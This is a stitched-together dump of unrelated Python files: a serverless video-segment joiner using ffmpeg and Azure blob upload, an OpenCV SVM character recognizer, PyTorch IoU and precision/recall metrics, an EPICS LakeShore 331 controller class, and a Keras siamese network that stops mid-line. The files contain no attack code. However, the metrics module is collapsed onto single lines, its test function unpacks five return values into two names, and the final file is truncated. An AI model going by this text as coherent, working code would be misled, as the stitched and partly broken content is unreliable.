    out_name = os.path.join(out_dir, f"{key}.mp4")
    return (out_dir, out_name)


@timer("prepare output with EFS")
def prepare_output_efs(key):
    """Create a uniquely named output directory on the EFS mount.

    :return: ``(out_dir, out_mp4_path)``
    """
    efs_id = str(uuid.uuid4())[:13]
    out_dir = os.path.join("/mnt/efs/", efs_id)
    os.mkdir(out_dir)
    out_name = os.path.join(out_dir, f"{key}.mp4")
    return (out_dir, out_name)


@timer("connect to progress endpoint")
async def connect_progress(endpoint):
    """Open a websocket to the progress endpoint; return None on failure.

    A None socket downgrades progress reporting to a no-op rather than
    failing the whole job.
    """
    socket = None
    try:
        socket = await ws.connect(endpoint)
        print(f"Connected to server {endpoint}")
    except Exception as e:
        print(f"Could not connect websocket: {str(e)}")
    return socket


@timer("joining videos")
async def join_videos(event):
    """Download rendered segments, concatenate them, and upload the result.

    Expects ``callbackEndpoint``, ``videoUrls`` and ``key`` in *event*.
    Returns a lambda-style ``{"statusCode": ..., "body": ...}`` dict.
    """
    callback_endpoint = event["callbackEndpoint"]
    video_urls = event["videoUrls"]
    key = event["key"]
    out_dir, out_name = prepare_output_efs(key)
    socket = await connect_progress(callback_endpoint)

    async def progress(msg):
        # Best-effort progress push; silently skipped when the socket is down.
        if socket is not None:
            wrapper = {"payload": msg, "key": key}
            await socket.send(json.dumps(wrapper))

    def short_progress(msg):
        asyncio.get_event_loop().create_task(
            progress({"type": "PROGRESS_STAGE", "stage": msg})
        )

    @timer("downloading videos")
    async def download_videos():
        @timer("fetching file")
        async def fetch(session, url):
            async with session.get(url, timeout=60) as response:
                res = await response.read()
                name = os.path.join(out_dir, url.rsplit("/", 1)[-1])
                with open(name, "wb") as f:
                    f.write(res)
                print(f"{url} downloaded to {name}")
                return name

        async with aiohttp.ClientSession() as session:
            return await asyncio.gather(
                *[fetch(session, url) for url in video_urls]
            )

    @timer("concat videos with ffmpeg")
    def concat_videos(video_files):
        # Fold segments pairwise; each pass concatenates the running result
        # with the next segment and deletes the inputs to bound disk usage.
        # https://stackoverflow.com/questions/7333232/how-to-concatenate-two-mp4-files-using-ffmpeg
        flist = os.path.join(out_dir, "file_list.txt")
        last_vid = video_files[0]
        index = 1
        for vid in video_files[1:]:  # renamed: original reused `v` inside the comprehension
            with open(flist, "w") as f:
                f.writelines(f"file '{p}'\n" for p in (last_vid, vid))
            new_vid = os.path.join(out_dir, f"fold_{index}.mp4")
            args = [
                r("res/bin/ffmpeg"),
                "-f",
                "concat",
                "-safe",
                "0",
                "-i",
                flist,
                "-c",
                "copy",
                new_vid,
            ]
            print(f"args: {' '.join(args)}")
            subprocess.check_call(args)
            os.remove(last_vid)
            os.remove(vid)
            last_vid = new_vid
            index += 1
        os.rename(last_vid, out_name)

    @timer("upload result")
    async def upload_vid():
        if blob_service_client is not None:
            client = blob_service_client.get_container_client("output").get_blob_client(
                f"{key}.mp4"
            )
            with open(out_name, "rb") as mp4:
                client.upload_blob(mp4)
            return client.url

    try:
        short_progress("Downloading video segments")
        video_files = await download_videos()
        short_progress("Joining video segments")
        concat_videos(video_files)
        result = {}
        if blob_service_client is not None:
            url = await upload_vid()
            print(f"Upload location: {url}")
            result["videoResult"] = {"url": url}
        return {"statusCode": 200, "body": json.dumps(result)}
    except Exception as e:
        return {"statusCode": 500, "body": json.dumps({"error": str(e)})}
    finally:
        if socket is not None:
            await socket.close()
        shutil.rmtree(out_dir)


async def main_async(event):
    """Dispatch a job: either join pre-rendered segments or run streetwarp.

    Returns a lambda-style ``{"statusCode": ..., "body": ...}`` dict.
    """
    if "joinVideos" in event and event["joinVideos"]:
        return await join_videos(event)
    key = event["key"]
    index = event.get("index")
    args = event["args"]
    use_optimizer = event["useOptimizer"]
    extension = event["extension"]
    contents = event["contents"]
    callback_endpoint = event["callbackEndpoint"]
    in_file = prepare_input(key, contents, extension)
    out_dir, out_name = prepare_output(key)
    args += ["--output-dir", out_dir, "--output", out_name, in_file]
    if use_optimizer:
        args += ["--optimizer", os.path.join(sw_path, "path_optimizer", "main.py")]
    socket = await connect_progress(callback_endpoint)

    async def progress(msg):
        # Best-effort progress push; silently skipped when the socket is down.
        if socket is not None:
            wrapper = {"payload": msg, "key": key, "index": index}
            await socket.send(json.dumps(wrapper))

    @timer("upload video")
    def upload_vid(client):
        with open(out_name, "rb") as mp4:
            client.upload_blob(mp4)

    @timer("run streetwarp")
    async def streetwarp():
        stderr = []
        result = []

        def on_out(line):
            # streetwarp emits one JSON object per line: progress messages are
            # forwarded to the websocket, everything else is collected.
            try:
                msg = json.loads(line)
                if "type" in msg and msg["type"] in ("PROGRESS", "PROGRESS_STAGE"):
                    print(f"streetwarp progress: {line}")
                    asyncio.get_event_loop().create_task(progress(msg))
                else:
                    result.append(msg)
            except Exception as e:
                print(f"Could not parse streetwarp output {line}", file=sys.stderr)
                print(f"Error: {str(e)}", file=sys.stderr)

        def on_err(line):
            print(f"streetwarp err: {line}")
            stderr.append(line)

        exit_code = await run("streetwarp", args, on_out, on_err)
        if exit_code != 0:
            err_text = "\n".join(stderr)
            print(f'streetwarp failed (args=[{" ".join(args)}])', file=sys.stderr)
            print(f"stderr: {err_text}", file=sys.stderr)
            raise RuntimeError(f"streetwarp failed with exit code {exit_code}")
        # The final non-progress JSON message is the metadata result.
        # NOTE(review): raises IndexError if streetwarp printed no JSON at all.
        return result[-1]

    try:
        metadata = await streetwarp()
        result = {"metadataResult": metadata}
        if "--dry-run" not in args and blob_service_client is not None:
            name = f"{key}.mp4" if index is None else f"seg_{key}_{index}.mp4"
            client = blob_service_client.get_container_client("output").get_blob_client(
                name
            )
            upload_vid(client)
            print(f"Upload location: {client.url}")
            result["videoResult"] = {"url": client.url}
        return {"statusCode": 200, "body": json.dumps(result)}
    except Exception as e:
        return {"statusCode": 500, "body": json.dumps({"error": str(e)})}
    finally:
        if socket is not None:
            await socket.close()
        shutil.rmtree(out_dir)


@timer("main function")
def main(event, _context):
    """Synchronous handler entry point.

    NOTE(review): get_event_loop() is kept (rather than asyncio.run) so a
    warm container can reuse its loop across invocations — confirm this is
    intentional for the target runtime.
    """
    return asyncio.get_event_loop().run_until_complete(main_async(event))
# repo: 18970738669/opencv_demo
# (the original first line was a raw "<reponame>..." artifact, which is not
# valid Python and made the module unimportable)
import cv2
import os
import json
import numpy as np
from numpy.linalg import norm

# Side length (pixels) all character images are normalized to.
SZ = 20


def deskew(img):
    """Straighten a character image using its second-order image moments.

    Returns a copy when the image has almost no vertical variance
    (nothing to deskew), otherwise the warped SZ x SZ image.
    """
    m = cv2.moments(img)
    if abs(m['mu02']) < 1e-2:
        return img.copy()
    skew = m['mu11'] / m['mu02']
    # Shear that cancels the measured skew, anchored at the image center.
    M = np.float32([[1, skew, -0.5 * SZ * skew], [0, 1, 0]])
    img = cv2.warpAffine(img, M, (SZ, SZ), flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR)
    return img


def preprocess_hog(digits):
    """Compute a 64-dim HOG-style descriptor for each image in *digits*.

    Each image is split into four 10x10 cells; per cell a 16-bin gradient
    orientation histogram is accumulated, weighted by gradient magnitude.
    The concatenated histogram is Hellinger-normalized (sqrt after L1, then
    L2), which the original code also did.  Returns a float32 array of
    shape ``(len(digits), 64)``.
    """
    samples = []
    for img in digits:
        gx = cv2.Sobel(img, cv2.CV_32F, 1, 0)
        gy = cv2.Sobel(img, cv2.CV_32F, 0, 1)
        mag, ang = cv2.cartToPolar(gx, gy)
        bin_n = 16
        # Renamed from `bin`, which shadowed the builtin.
        bins = np.int32(bin_n * ang / (2 * np.pi))
        bin_cells = bins[:10, :10], bins[10:, :10], bins[:10, 10:], bins[10:, 10:]
        mag_cells = mag[:10, :10], mag[10:, :10], mag[:10, 10:], mag[10:, 10:]
        hists = [np.bincount(b.ravel(), m.ravel(), bin_n)
                 for b, m in zip(bin_cells, mag_cells)]
        hist = np.hstack(hists)
        eps = 1e-7
        hist /= hist.sum() + eps
        hist = np.sqrt(hist)
        hist /= norm(hist) + eps
        samples.append(hist)
    return np.float32(samples)


class StatModel(object):
    """Thin persistence wrapper around an OpenCV ml statistical model."""

    def load(self, fn):
        # NOTE(review): the loaded model is returned and rebound here; confirm
        # this matches the installed OpenCV version's API (some versions
        # expose cv2.ml.SVM_load(fn) instead of an instance-level load).
        self.model = self.model.load(fn)

    def save(self, fn):
        self.model.save(fn)


class SVM(StatModel):
    """RBF-kernel C-SVC classifier built on cv2.ml.SVM."""

    def __init__(self, C=1, gamma=0.5):
        self.model = cv2.ml.SVM_create()
        self.model.setGamma(gamma)
        self.model.setC(C)
        self.model.setKernel(cv2.ml.SVM_RBF)
        self.model.setType(cv2.ml.SVM_C_SVC)

    # Train the SVM on row-major samples.
    def train(self, samples, responses):
        self.model.train(samples, cv2.ml.ROW_SAMPLE, responses)

    # Character recognition: returns the flat array of predicted labels.
    def predict(self, samples):
        r = self.model.predict(samples)
        return r[1].ravel()


class CardPredictor:
    """Trains (or loads) an SVM for handwritten-character recognition."""

    def __del__(self):
        # Persist the trained model when the predictor is garbage-collected.
        # NOTE(review): file I/O in __del__ is fragile (it may run during
        # interpreter shutdown); kept for backward compatibility.
        self.save_traindata()

    def train_svm(self):
        # Recognizes English letters and digits.
        self.modelshouxie = SVM(C=1, gamma=0.5)
        if os.path.exists("svmshouxie.dat"):
            # Reuse a previously saved model instead of retraining.
            self.modelshouxie.load("svmshouxie.dat")
        else:
            chars_train = []
            chars_label = []
            # Directory layout: one single-character directory name per class;
            # the class label is that character's ordinal.
            for root, dirs, files in os.walk("/home/python/Desktop/opencv_test/opencv_test1/train_shouxie/Validation"):
                if len(os.path.basename(root)) > 1:
                    continue
                root_int = ord(os.path.basename(root))
                print("-" * 20)
                print(os.path.basename(root))
                for filename in files:
                    if filename == ".DS_Store":
                        continue
                    print(filename)
                    filepath = os.path.join(root, filename)
                    digit_img = cv2.imread(filepath)
                    digit_img = cv2.cvtColor(digit_img, cv2.COLOR_BGR2GRAY)
                    chars_train.append(digit_img)
                    # chars_label.append(1)
                    chars_label.append(root_int)
            chars_train = list(map(deskew, chars_train))
            chars_train = preprocess_hog(chars_train)
            # chars_train = chars_train.reshape(-1, 20, 20).astype(np.float32)
            chars_label = np.array(chars_label)
            print(chars_train.shape)
            self.modelshouxie.train(chars_train, chars_label)

    def save_traindata(self):
        if not os.path.exists("svmshouxie.dat"):
            self.modelshouxie.save("svmshouxie.dat")


if __name__ == '__main__':
    c = CardPredictor()
    c.train_svm()
    part_card = cv2.imread("/home/python/Desktop/opencv_test/opencv_test1/qiegezifu1_3.jpg")
    # Pad horizontally to SZ, then resize to the SZ x SZ training geometry.
    w = abs(part_card.shape[1] - SZ) // 2
    part_card = cv2.copyMakeBorder(part_card, 0, 0, w, w, cv2.BORDER_CONSTANT, value=[0, 0, 0])
    part_card = cv2.resize(part_card, (SZ, SZ), interpolation=cv2.INTER_AREA)
    # NOTE(review): the test image is fed to preprocess_hog still in BGR while
    # training used grayscale — confirm this asymmetry is intended.
    part_card = preprocess_hog([part_card])
    resp = c.modelshouxie.predict(part_card)
    print(chr(resp[0]))
    # img = cv2.imread("/home/python/Desktop/opencv_test/samoye1.jpg")
    # cv2.imshow("img", img)
    # cv2.waitKey(0)
import torch import torch.nn as nn import numpy as np # NYU14_name_list = ['Unknown', 'Bed', 'Books', 'Ceiling', 'Chair', # 'Floor', 'Furniture', 'Objects', 'Picture', # 'Sofa', 'Table', 'TV', 'Wall', 'Window' # ] # Label11_name_list = ["None", "Ceiling", "Floor", "Wall", "Window", # "Chair", "Bed", "Sofa", "Desk","TV","Furniture","Objects"] class Metric_IoU_base(nn.Module): """ Given two [n,class] tensors, calculating per class IoU and average IoU """ def __init__(self): super().__init__() self.epsilon = 1e-6 self.register_buffer('output', torch.ones([], requires_grad=False)) self.register_buffer('intersections', torch.ones([], requires_grad=False)) self.register_buffer('unions', torch.ones([], requires_grad=False)) # self.register_buffer('valid', torch.ones([], requires_grad=False)) def __call__(self, pred, gt): class_num = pred.size(-1) self.output = torch.ones([]) self.valid = torch.ones([]) self.intersections = torch.zeros([class_num]) self.unions = torch.zeros([class_num]) self.output = torch.zeros([class_num]) # self.valid = torch.zeros([class_num]) for class_n in range(class_num): pred_c = pred[:, class_n].flatten() gt_c = gt[:, class_n].flatten() intersection = (pred_c & gt_c).float().sum() # if one of them is 0: 0 union = (pred_c | gt_c).float().sum() # if both 0: 0 iou = (intersection+self.epsilon)/(union+self.epsilon) iou = iou.unsqueeze(-1) intersection = intersection.unsqueeze(-1) union = union.unsqueeze(-1) # valid = gt_c.sum() > 0 # valid = valid.unsqueeze(-1) self.intersections[class_n] = intersection self.unions[class_n] = union self.output[class_n] = iou # self.valid[class_n] = valid return self.output, self.intersections, self.unions#, self.valid class Metric_PR_Base(nn.Module): """ Given two [n,class] tensors, calculating per class accuracy """ def __init__(self): super().__init__() self.epsilon = 1e-6 self.register_buffer('precisions', torch.ones([], requires_grad=False)) self.register_buffer('recalls', torch.ones([], requires_grad=False)) # 
self.register_buffer('valid', torch.ones([], requires_grad=False)) self.register_buffer('intersection', torch.ones([], requires_grad=False)) self.register_buffer('gt_sum', torch.ones([], requires_grad=False)) self.register_buffer('pred_sum', torch.ones([], requires_grad=False)) def __call__(self, pred, gt): class_num = pred.size(-1) self.precisions = torch.zeros([class_num]) self.recalls = torch.zeros([class_num]) # self.valid = torch.zeros([class_num]) self.intersection = torch.zeros([class_num]) self.gt_sum = torch.zeros([class_num]) self.pred_sum = torch.zeros([class_num]) for class_n in range(class_num): pred_c = pred[:, class_n].flatten() gt_c = gt[:, class_n].flatten() intersection = (pred_c & gt_c).float().sum() # if one of them is 0: 0 gt_sum = gt_c.sum() pred_sum = pred_c.sum() r = (intersection+self.epsilon)/(gt_sum+self.epsilon) p = (intersection+self.epsilon)/(pred_sum+self.epsilon) r= r.unsqueeze(-1) p= p.unsqueeze(-1) # valid = gt_c.sum() > 0 # valid = valid.unsqueeze(-1) self.precisions[class_n] = p self.recalls[class_n] = r # self.valid[class_n] = valid self.intersection[class_n] += intersection.cpu() self.gt_sum[class_n] += gt_sum.cpu() self.pred_sum[class_n] += pred_sum.cpu() return self.precisions, self.recalls, self.intersection, \ self.gt_sum, self.pred_sum class Metric_IoU(nn.Module): def __init__(self): super().__init__() self.iou = Metric_IoU_base() def __call__(self, pred_, gt_, class_num, mask_=None): """ Parameters ---------- pred_ : TYPE Shape=[batch, class, ...] gt_ : TYPE Shape=[batch, ...] class_num : TYPE Number of classes mask_ : TYPE, optional Shape=[batch, ...]. 
Larger than 0 are the region to be masked Returns ------- IoU, Intersections, Unions, Valid """ volume = torch.argmax(pred_, dim=1) volume = volume.clamp(0, class_num-1) gt = gt_.clamp(0, class_num-1) if mask_ is not None: volume = volume[mask_ == 0] gt = gt[mask_ == 0] # print('arg\n', volume) volume = torch.nn.functional.one_hot(volume, class_num).view(-1,class_num) # print('onehot volume\n', volume) gt = torch.nn.functional.one_hot(gt,class_num).view(-1,class_num) # print('onehot gt\n', gt) return self.iou(volume,gt) class Metric_PR(nn.Module): def __init__(self): super().__init__() self.acc = Metric_PR_Base() def __call__(self, pred_, gt_, class_num, mask_=None): """ Parameters ---------- pred_ : TYPE Shape=[batch, class, ...] gt_ : TYPE Shape=[batch, ...] class_num : TYPE Number of classes mask_ : TYPE, optional Shape=[batch, ...]. Larger than 0 are the region to be masked Returns ------- Accuracy, Recall, Valid """ volume = torch.argmax(pred_, dim=1) volume = volume.clamp(0, class_num-1) gt = gt_.clamp(0, class_num-1) if mask_ is not None: volume = volume[mask_ == 0] gt = gt[mask_ == 0] volume = torch.nn.functional.one_hot(volume, class_num).view(-1,class_num) gt = torch.nn.functional.one_hot(gt,class_num).view(-1,class_num) return self.acc(volume,gt) def Metric_F1(precision, recall): return 2 * precision * recall / (precision + recall) def test_basic(): batch=1 class_num=3 volume_pred = torch.rand(batch,class_num,1,1,2) full_gt = torch.randint(0, class_num,size=(batch,1,1,2)) volume_pred = torch.FloatTensor([[0.1,0.1,0.7],[1,0,0], [0.2,0.8,0.0], [0,0,1], [0,1,0]]) #2,0,1,2,1 full_gt = torch.LongTensor([[2],[1],[2],[1],[1]]) print('volume_pred', volume_pred) print('gt', full_gt) # Semantic print("semantic: ") iou_ = Metric_IoU() acc_ = Metric_PR() iou, inters, unions = iou_(volume_pred, full_gt,class_num = class_num) print('expect intersections: [0, 1, 1], got', inters,'mean',inters.mean()) print('expect unions: [1, 4, 3], got', unions,'mean',unions.mean()) 
print('expect IoU: [0, 0.25, 0.33], got', iou,'mean',iou.mean()) acc, recall = acc_(volume_pred, full_gt,class_num = class_num) print('expect Accuracy: [0, 0.33, 0.5], got', acc,'mean',acc.mean()) print('expect Recall: [0, 0.5, 0.5], got', recall,'mean',recall.mean()) # Completion print("completion: ") iou_ = Metric_IoU() acc_ = Metric_PR() iou, inters, unions = iou_(volume_pred, full_gt,class_num = 2) print('expect intersections: [0, 4], got', inters, 'mean',inters.mean()) print('expect unions: [1, 5], got', unions,'mean',unions.mean()) print('expect IoU: [0, 0.8], got', iou,'mean',iou.mean()) acc, recall = acc_(volume_pred, full_gt,class_num = 2) print('expect Accuracy: [0, 0.8], got', acc,'mean',acc.mean()) print('expect Recall: [0, 0.8], got', recall,'mean',recall.mean()) print('recall mean: ', recall.mean()) def test(): from torch.utils.data import DataLoader from dataset_volume import Dataset from config import Config config = Config('../config.yml.example') config.BATCH_SIZE=1 train_dataset = Dataset(config, '../example_data/train', '../example_data/gt','../example_data/mask') train_loader = DataLoader( dataset=train_dataset, batch_size=config.BATCH_SIZE, num_workers=1, drop_last=True, shuffle=False ) iou_ = Metric_IoU() acc_ = Metric_PR() for items in train_loader: volume,gt,mask = items # name = items # gt = torch.from_numpy(gt) gt2 = torch.nn.functional.one_hot(gt,14).view(-1,14) for i in range(14): print(gt2[:,i].sum().item()) volume_pred = torch.rand(config.BATCH_SIZE, config.CLASS_NUM,config.DATA_DIMS[0],config.DATA_DIMS[1], config.DATA_DIMS[2]) # Semantic iou, inter, union= iou_(volume_pred,gt, config.CLASS_NUM) acc, recall, inter2, gt_sum, pred_sum = acc_(volume_pred, gt,config.CLASS_NUM) print("Semantic") print("iou:",iou, "mean", iou.mean()) print("inter:",inter, "mean", inter.mean()) print("union:", union, "mean", union.mean()) print("acc:",acc, "acc", acc.mean()) print("recall:",recall, "mean", recall.mean()) # Completion iou, inter, union= 
iou_(volume_pred,gt, 2) acc, recall, inter, gt_sum, pred_sum = acc_(volume_pred, gt, 2) print("Completion") print("iou:",iou, "mean", iou.mean()) print("inter:",inter, "mean", inter.mean()) print("union:", union, "mean", union.mean()) print("acc:",acc, "acc", acc.mean()) print("recall:",recall, "mean", recall.mean()) print('\n\n') break if __name__ == "__main__": test()
# py4syn/epics/LakeShore331Class.py
"""LakeShore 331 Class

Python Class for EPICS LakeShore 331

:platform: Unix
:synopsis: Python Class for EPICS LakeShore 331

.. moduleauthor:: <NAME> <<EMAIL>>
    .. note:: 06/07/2015 [douglas.beniz]  first version released
"""
from epics import Device
from enum import Enum
from time import sleep

from py4syn.epics.IScannable import IScannable
from py4syn.epics.StandardDevice import StandardDevice


class LakeShore_t(Enum):
    """
    Enumeration of LakeShore channels.
    """
    Channel_A = 0  # channel A
    Channel_B = 1  # channel B


class ControoLoopMode_t(Enum):
    """
    Enumeration of Control Loop Modes.

    NOTE(review): the class name carries a historical typo ("Controo");
    it is kept for backward compatibility and aliased below.
    """
    CLM_Manual_PID = 1
    CLM_Zone = 2
    CLM_OpenLoop = 3
    CLM_AutoTune_PID = 4
    CLM_AutoTune_PI = 5
    CLM_AutoTune_P = 6


# Correctly-spelled alias; new code should prefer this name.
ControlLoopMode_t = ControoLoopMode_t


class LakeShore331 (IScannable, StandardDevice):
    """
    Python class to help configuration and control of LakeShore 331 devices
    via Hyppie over EPICS.

    Examples
    --------
    >>> from py4syn.epics.LakeShore331 import LakeShore331
    >>> ls331 = LakeShore331("DXAS:LS331", "ls331", channel=0)  # Use 1 for Ch B
    >>> ls331.setValue(120)  # 120 degrees Celsius
    """

    def __init__ (self, pvPrefix="", mnemonic="", channel=0):
        """
        **Constructor**
        See :class:`py4syn.epics.StandardDevice`

        Parameters
        ----------
        pvPrefix : `string`
            LakeShore331's device base naming of the PV (Process Variable);
            Like DXAS:LS331;
        mnemonic : `string`
            LakeShore331's mnemonic
        channel : `int`
            0 selects channel A (default); 1 selects channel B.
        """
        StandardDevice.__init__(self, mnemonic)
        # Main device: read-back (Get*) and set (Set*) PVs of the controller.
        self.lakeshore331 = Device(pvPrefix + ':',
                                   ('GetHEAT', 'GetHeaterRange', 'GetAPIDD', 'GetAPIDI',
                                    'GetAPIDP', 'GetASetPoint', 'GetBPIDD', 'GetBPIDI',
                                    'GetBPIDP', 'GetBSetPoint', 'GetCTempA', 'GetCTempB',
                                    'GetKTempA', 'GetKTempB', 'SetHeaterRange', 'SetAPIDD',
                                    'SetAPIDI', 'SetAPIDP', 'SetASetPoint', 'SetBPIDD',
                                    'SetBPIDI', 'SetBPIDP', 'SetBSetPoint', 'GetCmode',
                                    'SetCmode'))
        # Secondary device: control-loop PID selection and trigger PVs.
        self.ls331_control = Device(pvPrefix + ':CONTROL:',
                                    ['SetAPID', 'SetBPID', 'Trigger'])

        if (channel == 1):
            self.ls331_channel = LakeShore_t.Channel_B
        else:
            # Default
            self.ls331_channel = LakeShore_t.Channel_A

    def getHeat(self):
        """
        Heater output query.

        Returns
        -------
        `float`, e.g.: 51.530
        """
        return self.lakeshore331.get('GetHEAT')

    def getHeaterRange(self):
        """
        Heater range query.

        Returns
        -------
        `float`
        """
        return self.lakeshore331.get('GetHeaterRange')

    def getAPIDD(self):
        """
        Returns value D of PID for channel A.

        Returns
        -------
        `integer`
        """
        return self.lakeshore331.get('GetAPIDD')

    def getBPIDD(self):
        """
        Returns value D of PID for channel B.

        Returns
        -------
        `integer`
        """
        return self.lakeshore331.get('GetBPIDD')

    def getAPIDI(self):
        """
        Returns value I of PID for channel A.

        Returns
        -------
        `integer`
        """
        return self.lakeshore331.get('GetAPIDI')

    def getBPIDI(self):
        """
        Returns value I of PID for channel B.

        Returns
        -------
        `integer`
        """
        return self.lakeshore331.get('GetBPIDI')

    def getAPIDP(self):
        """
        Returns value P of PID for channel A.

        Returns
        -------
        `integer`
        """
        return self.lakeshore331.get('GetAPIDP')

    def getBPIDP(self):
        """
        Returns value P of PID for channel B.

        Returns
        -------
        `integer`
        """
        return self.lakeshore331.get('GetBPIDP')

    def getASetPoint(self):
        """
        Returns setpoint value for channel A.

        Returns
        -------
        `float`
        """
        # BUG FIX: previously read the 'SetASetPoint' PV; the read-back PV is
        # 'GetASetPoint' (mirrors getBSetPoint, which reads 'GetBSetPoint').
        return self.lakeshore331.get('GetASetPoint')

    def getBSetPoint(self):
        """
        Returns setpoint value for channel B.

        Returns
        -------
        `float`
        """
        return self.lakeshore331.get('GetBSetPoint')

    def getCTempA(self):
        """
        Returns channel A temperature in Celsius degrees.

        Returns
        -------
        `float`
        """
        return self.lakeshore331.get('GetCTempA')

    def getCTempB(self):
        """
        Returns channel B temperature in Celsius degrees.

        Returns
        -------
        `float`
        """
        return self.lakeshore331.get('GetCTempB')

    def getKTempA(self):
        """
        Returns channel A temperature in Kelvin.

        Returns
        -------
        `float`
        """
        return self.lakeshore331.get('GetKTempA')

    def getKTempB(self):
        """
        Returns channel B temperature in Kelvin.

        Returns
        -------
        `float`
        """
        return self.lakeshore331.get('GetKTempB')

    def setHeaterRange(self, heaterRange):
        """
        Heater range command.

        Parameters
        ----------
        heaterRange : `float`
        """
        self.lakeshore331.put('SetHeaterRange', heaterRange, wait=True)

    def setASetPoint(self, setPoint):
        """
        Set a setpoint value for channel A.

        Parameters
        ----------
        setPoint : `float`
        """
        self.lakeshore331.put('SetASetPoint', setPoint, wait=True)

    def setBSetPoint(self, setPoint):
        """
        Set a setpoint value for channel B.

        Parameters
        ----------
        setPoint : `float`
        """
        self.lakeshore331.put('SetBSetPoint', setPoint, wait=True)

    def setAPIDD(self, pid_d):
        """
        D parameter value of PID for channel A.

        Parameters
        ----------
        pid_d : `integer`
        """
        self.lakeshore331.put('SetAPIDD', pid_d, wait=True)

    def setBPIDD(self, pid_d):
        """
        D parameter value of PID for channel B.

        Parameters
        ----------
        pid_d : `integer`
        """
        self.lakeshore331.put('SetBPIDD', pid_d, wait=True)

    def setAPIDI(self, pid_i):
        """
        I parameter value of PID for channel A.

        Parameters
        ----------
        pid_i : `integer`
        """
        self.lakeshore331.put('SetAPIDI', pid_i, wait=True)

    def setBPIDI(self, pid_i):
        """
        I parameter value of PID for channel B.

        Parameters
        ----------
        pid_i : `integer`
        """
        self.lakeshore331.put('SetBPIDI', pid_i, wait=True)

    def setAPIDP(self, pid_p):
        """
        P parameter value of PID for channel A.

        Parameters
        ----------
        pid_p : `integer`
        """
        self.lakeshore331.put('SetAPIDP', pid_p, wait=True)

    def setBPIDP(self, pid_p):
        """
        P parameter value of PID for channel B.

        Parameters
        ----------
        pid_p : `integer`
        """
        self.lakeshore331.put('SetBPIDP', pid_p, wait=True)

    def getCMode(self):
        """Get Control Loop Mode (see :class:`ControoLoopMode_t`)."""
        return self.lakeshore331.get('GetCmode')

    def setCMode(self, cmode):
        """Set Control Loop Mode (see :class:`ControoLoopMode_t`)."""
        self.lakeshore331.put('SetCmode', cmode, wait=True)

    def setControlAPID(self, a_pid):
        """
        PID for channel A.

        Parameters
        ----------
        a_pid : `integer`
        """
        self.ls331_control.put('SetAPID', a_pid, wait=True)

    def setControlBPID(self, b_pid):
        """
        PID for channel B.

        Parameters
        ----------
        b_pid : `integer`
        """
        self.ls331_control.put('SetBPID', b_pid, wait=True)

    def setControlTrigger(self, trigger):
        """
        Trigger.

        Parameters
        ----------
        trigger : `integer`
        """
        self.ls331_control.put('Trigger', trigger, wait=True)

    def getValue(self):
        """
        Scannable interface: read the configured channel's temperature.

        Returns
        -------
        `float`, Temperature in Celsius degrees
        """
        if (self.ls331_channel == LakeShore_t.Channel_A):
            return self.getCTempA()
        else:
            return self.getCTempB()

    def setValue(self, temperature):
        """
        Scannable interface: set the configured channel's setpoint.

        Parameters
        ----------
        temperature : `float`, Temperature in Celsius degrees
        """
        if (self.ls331_channel == LakeShore_t.Channel_A):
            self.setASetPoint(temperature)
        else:
            self.setBSetPoint(temperature)

    def wait(self):
        """
        Wait... (no settling wait is implemented; sleep(0) only yields).
        """
        sleep(0)

    def getLowLimitValue(self):
        """
        Gets scannable lower limit.

        Returns
        -------
        `float`
        """
        # Mininum is 0 K... -272.15 .oC
        return -272.15

    def getHighLimitValue(self):
        """
        Gets scannable upper limit.

        Returns
        -------
        `float`
        """
        # Unsure about maximum... let's put 325 K... 51.85 .oC
        return 51.85
from __future__ import absolute_import from __future__ import print_function import numpy as np import random import os from cv2 import imread from keras.layers import Input,Conv2D,MaxPooling2D,Flatten,Dense,Dropout,Lambda,LSTM,BatchNormalization,LeakyReLU,PReLU from keras import Sequential from keras.datasets import mnist from keras.models import Model from keras.layers import Input, Flatten, Dense, Dropout, Lambda from keras.optimizers import RMSprop,Adam from keras import initializers, regularizers, optimizers from keras import backend as K from keras.regularizers import l2 from keras.initializers import VarianceScaling from keras.callbacks import ModelCheckpoint import matplotlib.pyplot as plt import numpy.random as rng def contrastive_loss(y_true, y_pred): margin = 0.6 square_pred = K.square(y_pred) margin_square = K.square(K.maximum(margin - y_pred, 0)) return K.mean(y_true * square_pred + (1 - y_true) * margin_square) def W_init(shape,name=None): values = rng.normal(loc=0,scale=1e-2,size=shape) return K.variable(values,name=name) def b_init(shape,name=None): values=rng.normal(loc=0.5,scale=1e-2,size=shape) return K.variable(values,name=name) def SiameseNetwork(input_shape): top_input = Input(input_shape) bottom_input = Input(input_shape) # Network model = Sequential() model.add(Conv2D(96,(7,7),activation='relu')) model.add(MaxPooling2D()) model.add(BatchNormalization()) model.add(Conv2D(64,(5,5),activation='relu')) model.add(MaxPooling2D()) model.add(BatchNormalization()) model.add(Conv2D(64,(5,5),activation='relu')) model.add(MaxPooling2D()) model.add(BatchNormalization()) model.add(Flatten()) model.add(Dense(4096,activation='relu')) model.add(BatchNormalization()) model.add(Dense(1024,activation='relu')) model.add(BatchNormalization()) model.add(Dense(512,activation='relu')) model.add(BatchNormalization()) encoded_top = model(top_input) encoded_bottom = model(bottom_input) L1_layer = Lambda(lambda tensors:K.abs(tensors[0] - tensors[1])) L1_distance = 
L1_layer([encoded_top, encoded_bottom]) prediction = Dense(1,activation='sigmoid',bias_initializer=b_init)(L1_distance) siamesenet = Model(inputs=[top_input,bottom_input],outputs=prediction) return siamesenet def loadimgs(path,n = 0): X=[] y = [] curr_y = n for alphabet in os.listdir(path): print("loading alphabet: " + alphabet) alphabet_path = os.path.join(path,alphabet) category_images=[] for filename in os.listdir(alphabet_path): image_path = os.path.join(alphabet_path, filename) image = imread(image_path).astype('float32')/255 category_images.append(image) y.append(curr_y) try: X.append(np.stack(category_images)) except ValueError as e: print(e) print("error - category_images:", category_images) curr_y += 1 y = np.vstack(y) X = np.stack(X) return X,y def create_pairs(x, digit_indices): '''Positive and negative pair creation. Alternates between positive and negative pairs. ''' num_classes = 23 pairs = [] labels = [] n = min([len(digit_indices[d]) for d in range(num_classes)]) - 1 for d in range(num_classes): for i in range(n): z1, z2 = digit_indices[d][i], digit_indices[d][i + 1] # each folder should have same number of image ex 1447 here f21 = z1//1447 l31 = z1 % 1447 f22 = z2//1447 l32 = z2 % 1447 pairs += [[x[f21][l31], x[f22][l32]]] inc = random.randrange(1, num_classes) dn = (d + inc) % num_classes z1, z2 = digit_indices[d][i], digit_indices[dn][i] f21 = z1//1447 l31 = z1 % 1447 f22 = z2//1447 l32 = z2 % 1447 pairs += 